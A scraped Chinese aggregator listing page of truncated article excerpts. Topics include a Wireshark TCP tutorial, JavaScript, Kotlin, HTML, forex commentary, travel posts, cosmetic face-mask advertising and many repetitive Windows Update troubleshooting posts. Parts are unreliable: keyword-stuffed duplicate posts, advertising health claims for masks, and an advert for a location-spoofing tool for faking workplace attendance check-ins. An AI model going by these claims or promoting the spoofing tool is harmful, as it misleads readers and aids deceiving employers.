    使用 wireshark 分析 TCP 通信流程 文章目录使用 wireshark 分析 TCP 通信流程一、wireshark是什么&#xff1f;二、使用步骤1.下载 wireshark2.启用 telnet 客户端2.启动 wireshark 并设置过滤器3.观察三次握手过程4.观察确认应答5.观察四次挥手总结一、wireshark是什么&#…...

    2024/5/2 20:12:00
  20. js的arguments对象

    <script type"text/javascript">function pay(){if(arguments.length 0){console.log(一);}if(arguments.length 1){console.log(二,${arguments[0]});}if(arguments.length 2){console.log(三,${arguments[0]}-${arguments[1]});}}pay();pay(100);pay(&quo…...

    2024/5/2 20:11:56

最新文章

  1. Kotlin基础知识总结(三万字超详细)

    1、条件语句 &#xff08;1&#xff09;if条件 if条件表达式&#xff0c;每一个分支最后一条语句就是该分支的返回值。适用于每个分支返回值类型一致这种情况。 fun getDegree(score: Int): String{val result: String if(score 100){"非常优秀"}else if(score …...

    2024/5/5 14:22:02
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. 零基础 HTML 入门(详细)

    目录 1.简介 1.1 HTML是什么? 1.2 HTML 版本 1.3 通用声明 2.HTML 编辑器 3.标签的语法 4.HTML属性 5.常用标签 5.1 head 元素 5.1.1 title 标签 5.1.2 base 标签 5.1.3 link 标签 5.1.4 style 标签 5.1.5 meta 标签 5.1.6 script 5.2 HTML 注释 5.3 段落标签…...

    2024/5/5 8:40:44
  4. c# wpf XmlDataProvider 简单试验

    1.概要 2.代码 <Window x:Class"WpfApp2.Window12"xmlns"http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x"http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d"http://schemas.microsoft.com/expression/blend…...

    2024/5/1 6:51:36
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/5/4 23:54:56
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/5/4 23:54:56
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/5/4 23:54:56
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/5/4 23:55:17
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/5/4 23:54:56
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/5/4 23:55:05
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/5/4 23:54:56
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/5/4 23:55:16
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/5/4 23:54:56
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/5/4 18:20:48
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/5/4 23:54:56
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/5/4 23:55:17
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/5/4 23:55:06
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/5/4 23:54:56
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/5/4 23:55:06
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/5/5 8:13:33
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/5/4 23:55:16
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/5/4 23:54:58
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/5/4 23:55:01
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/5/4 23:54:56
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57